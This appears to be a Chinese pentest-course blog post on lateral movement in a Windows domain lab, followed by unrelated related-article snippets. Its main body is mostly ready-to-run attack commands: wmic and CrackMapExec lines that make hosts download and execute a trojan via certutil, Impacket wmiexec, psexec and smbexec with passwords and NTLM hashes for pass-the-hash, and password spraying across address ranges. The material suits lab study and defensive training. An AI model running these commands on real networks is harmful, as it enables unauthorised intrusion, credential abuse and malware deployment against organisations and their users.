第129天:内网安全-横向移动WmiSmbCrackMapExecProxyChainsImpacket

这里这个环境继续上一篇文章搭建的环境

案例一: 域横向移动-WMI-自带&命令&套件&插件

首先上线win2008

首先提权到system权限

wmic是windows自带的命令,可以通过135端口进行连接利用,只支持明文方式,优点是不用上传别的东西,缺点是无回显。

利用system权限抓取明文密码和hash密码

直接获得了域控管理员的账号密码

探测存活主机 

进一步的信息收集上一篇文章写过

win2008开启监听并生成木马上传到本地web服务器

wmic 

利用wmic命令去连接别的主机,让目标主机去下载木马

wmic /node:目标ip /user:账号 /password:密码 process call create "执行命令"
wmic /node:192.168.3.30 /user:administrator /password:admin@123 process call create "certutil -urlcache -split -f http://192.168.3.20/2.exe 2.exe"

连接成功一般只有这种显示

成功上传

让他执行

成功上线

缺点就是没有任何回显

cscript

项目地址:https://github.com/AA8j/SecTools/tree/main/wmiexec.vbs

特点是会反弹一个新的窗口就导致没有办法在cs当中去运行,类似反弹shell,并且得借助一个vbs文件,且不支持hash

在3.20(win2008主机)上运行

cscript //nologo wmiexec.vbs /shell 192.168.3.30 账号 密码
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator 123.com

弹过来的新窗口反弹的ip为3.30

wmiexec-impacket

下载地址

1、Py版:https://github.com/SecureAuthCorp/impacket
python atexec.py god/administrator:Admin12345@192.168.3.21 “ver”
python atexec.py -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 “whoami”

2、Exe版:https://gitee.com/RichChigga/impacket-examples-windows

这种方式又拥有回显,又可以适配cs

生成代理节点

这里因为我是linux环境直接执行py文件,exe文件一个原理

wmiexec ./账号:密码@ip "命令"
wmiexec 域名/账号:密码@ip "命令"
wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"

尝试使用域控的hash进行连接

wmiexec -hashes :hash值 (域名或者.)/账号@192.168.3.40 "whoami"

执行上线

proxychains4 python wmiexec.py -hashes :afffeba176210fa/administrator@192.168.3.40 "certutil -urlcache -split -f h c:/222.exe & c:/222.exe"

案例二:  域横向移动-SMB-自带&命令&套件&插件

利用的是smb开放的445端口

命令

项目地址:PsTools - Sysinternals | Microsoft Learn

psexe也是反弹一个cmd所以不能直接在cs当中运行

windows官方用法
psexec64 \\192.168.3.32 -u administrator -p admin!@#45 -s cmd

这里因为我是linux系统所以我直接把文件拖入win2008进行运行,并且运行该文件的时候cmd权限必须为admin,这里也可以用socks代理执行,并且权限已经是system可以执行。

20执行获得30的cmd

套件

使用套件中的psexec

wmi套件中
psexec.py ./administrator:123.com@192.168.3.30
psexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.30

套件当中还有一个smbexec.py文件

python smbexec.py ./administrator:123.com@192.168.3.40 
python smbexec.py -hashes :579da618cfbfa85247acf1f800a280a4 administrator@192.168.20.30  

同样也是会弹出一个新的cmd会话

 

cs自带

先需要设置转发上线,因为内网不出网

选择域控密码,或者主机密码

域控上线

 利用psexec64+主机hash值上线win7

因为这里我所有主机都是一个密码,所以直接选这个,记得他会自动加上win2008的域,记得删除,然后就是提醒我们在内网渗透过程当中要尝试切换域内用户的登录方式,大部分会自动加上域

成功上线

案例三: 域横向移动-工具-Proxychains&CrackMapExec

这里proxychains我一直在用,不做过多介绍了

crackmapexec下载地址:(kali自带)GitHub - byt3bl33d3r/CrackMapExec: A swiss army knife for pentesting networks

基本用法

探测存活主机

crackmapexec smb 192.168.3.10-40 #探测存活主机

密码喷射域登录

crackmapexec smb 192.168.3.10-40 -u jie -p 123.com

这里由于我没有把密码和主机进行绑定,所以域内所有主机都可以用这个密码登录

密码喷射本地登录

crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com --local-auth

密码喷射本地登录加执行命令

crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com --local-auth -x "whoami"

尝试上线,记得设置转发上线,ip需要设置为内网ip

 利用下面的命令下载web服务器中的木马,并尝试运行上线

crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com -x "certutil -urlcache -split -f http://192.168.3.20/2.exe c:/zzzzz.exe & c:/zzzzz.exe"

 除了域控主机之外都上线了,切换域控密码喷射

高阶玩法

当收集到一台域内主机以后,可以尝试把收集到的密码,用户都写入字典当中

注意收集用户的时候不能用提权的账户,需要用域内账户

这里密码我基本上都是123.com

运行,这里注意要加一个参数,不然运行一个成功匹配后就不会继续往下运行

--continue-on-success

用字典密码去匹配

这个加continue参数好像只能够匹配密码,不能全上线,不加参数的话又指挥上线一个就掉了,不太懂了,可以匹配出来密码,用账号密码,一个一个去上线?

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/397186.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【区块链+医疗健康】医链 - 区块链医疗信息管理系统 | FISCO BCOS应用案例

根据《“十四五”规划和 2035 远景目标纲要》,我国在“十四五”时期将全面推进医疗信息化建设。工信部等部 门联合发布《关于加快推动区块链技术应用和产业发展的指导意见》,促进区块链在医疗健康等公共服务领域开 展应用,促进业务协同办理。…

ES6 export import

1.Export 模块是独立的文件,该文件内部的所有的变量外部都无法获取。如果希望获取某个变量,必须通过export输出, 声明的同时导出变量、函数以及类 // profile.js export var firstName Michael; export var lastName Jackson; export var…

【JUC】Java对象内存布局和对象头

文章目录 面试题Object object new Object() 谈谈你对这句话的理解? 对象在堆内存中存储布局权威定义(周志明老师JVM第三版)对象在堆内存中的存储布局详解对象头的MarkWord源码对象标记源码 对象内存布局(使用JOL证明&#xff09…

猫头虎 分享已解决Bug || java.lang.NullPointerException 解决方案

🐯 猫头虎 分享已解决Bug || java.lang.NullPointerException 解决方案 在 后端开发过程中,我们经常会遇到各种各样的Bug。而其中最常见之一就是 java.lang.NullPointerException。很多小伙伴在遇到这个问题时,往往会感到非常头痛&#xff0…

设计模式-单一职责模式

DecoratorBridge Decorator 动机 在某些情况下我们可能会 “过度地使用继承来扩展对象的功能”,由于继承为类型引入的静态特质,使得这种扩展方式缺乏灵活性;并且随着子类的增多(扩展功能的增多),各种子类的…

yolov8断点续训

1. 前言 我们在使用yolov8进行训练的时候往往会因为各种各样的原因中断训练,如: 开了太多程序导致崩溃突然断电其他原因 这时候如果下次能继续上次训练的结果继续训练会节省很多时间 2.复现与解决办法 2.1 正常启动训练 yolov8环境搭建与简单配置请…

给 Python 的第三方模块安装工具 pip 换源

sudo mkdir ~/.pipcd .pipsudo nano pip.conf[global] timeout 10 index-url http://mirrors.aliyun.com/pypi/simple/ extra-index-url http://pypi.douban.com/simple/ [install] trusted-hostmirrors.aliyun.compypi.douban.com喜欢或对你有帮助,点个赞吧&…

PMBOK® 第六版 规划范围管理

目录 读后感—PMBOK第六版 目录 规划范围管理就像是为项目划定清晰的界限,通过书面形式明确项目团队必须完成的工作,这有助于有效控制和交付目标产品,防止范围蔓延,合理分配资源,从而提高项目成功率和客户满意度。 一…

Tomcat搭建JSPServlet

一、Tomcat环境搭建 1. 将项目变为Web项目 选中项目,点击Help中的Find Action 搜索Add Framework Support 勾选Web Application 出现这些文件就是成功了 2. 配置Tomcat 点击Edit Configurations 点击加号,选择Tomcat Server Local Deployment栏下点击…

WPF篇(9)-CheckBox复选框+RadioButton单选框+RepeatButton重复按钮

CheckBox复选框 CheckBox继承于ToggleButton&#xff0c;而ToggleButton继承于ButtonBase基类。 案例 前端代码 <StackPanel Orientation"Horizontal" HorizontalAlignment"Center" VerticalAlignment"Center"><TextBlock Text"…

前端学习笔记-JS篇-01

JS基础Day1-01-必看-基本软件以及准备工作_哔哩哔哩_bilibili JavaScript介绍 是什么 1.JavaScript (是什么?) 是一种运行在客户端(浏览器)的编程语言&#xff0c;实现人机交互效果2.作用(做什么?) 网页特效(监听用户的一些行为让网页作出对应的反馈)表单验证(针对表单…

8.9-python管理

一、回顾 [rootpython ~]# vim test.py ​ a3 b4 print(ab) print(a**2b**2) print(25**0.5) ​ [rootpython ~]# python3 test.py 7 25 5.0 ​ ​ #调试test.py脚本 [rootpython ~]# python3 -m pdb test.py > /root/test.py(1)<module>() -> a3 (Pdb) n > …

SpringCloud天机学堂:我的课表(三)

SpringCloud天机学堂&#xff1a;我的课表&#xff08;三&#xff09; 文章目录 SpringCloud天机学堂&#xff1a;我的课表&#xff08;三&#xff09;1、添加课程到课表2、分页查询课表3、查询正在学习的课程 1、添加课程到课表 首先&#xff0c;用户支付完成后&#xff0c;需…

JSON + AJAX + ThreadLocal + 文件上传下载

JSON数据交换 规则 JSON对象和字符串转换 <script type"text/javascript">var jsonPerson {"name": "jack","age": 20}console.log(jsonPerson);var strPerson JSON.stringify(jsonPerson);//对jsonPerson没有影响console.lo…

django如何更新数据库字段并与数据库保持同步?

关键步骤&#xff1a; 第一步&#xff1a; 执行&#xff1a;python manage.py makemigrations 你的项目名称第二步&#xff1a;它会提示你选1还是2&#xff0c;这里因为添加字段&#xff0c;所以选1第三步&#xff1a;出现>>>这个&#xff0c;直接输入这个第四步&am…

cnetos部署高可用以及七层负载均衡

文章目录 centos部署高可用以及七层负载均衡一、准备环境二、配置高可用第一台&#xff1a;第二台&#xff1a; 三、配置负载均衡第一台的七层负载均衡器为haproxy第二台的七层负载均衡器为nginx 四、配置后端服务器五、测试 centos部署高可用以及七层负载均衡 一、准备环境 …

密码学基础:搞懂Hash函数SHA1、SHA-2、SHA3(1)

目录 1.消息摘要(Hash) 2.SHA-1 3.SHA-2 4.小结 1.消息摘要(Hash) Hash函数是一种单向密码体制&#xff0c;把任意长度的输入经过变换得到一个固定长度的输出&#xff0c;同时它还具备单向性&#xff0c;只能从明文到密文&#xff0c;不能逆向&#xff0c;正是由于Hash函数…

数据结构----队列和栈

小编会一直更新数据结构相关方面的知识&#xff0c;使用的语言是Java&#xff0c;但是其中的逻辑和思路并不影响&#xff0c;如果感兴趣可以关注合集。 希望大家看完之后可以自己去手敲实现一遍&#xff0c;同时在最后我也列出一些基本和经典的题目&#xff0c;可以尝试做一下。…

C# winform 三层架构 增删改查 修改数据(修改篇)

ss一.留言 本专栏三层架构已经更新了 添加 登录 显示&#xff0c;还差修改以及删除&#xff0c;本篇更新修改&#xff0c;主要操作为点击修改某一条数据&#xff0c;然后跳转页面进行修改。 二.展示 我们先看DAL代码 /// <summary>/// 修改/// </summary>/// &l…

算法基础知识——11种距离度量

简介&#xff1a;个人学习分享&#xff0c;如有错误&#xff0c;欢迎批评指正。 前言&#xff1a;距离的作用 数据聚类&#xff1a;距离度量在聚类算法&#xff08;如K-means、层次聚类&#xff09;中用于衡量数据点之间的相似性或差异性&#xff0c;帮助确定聚类的中心和边界…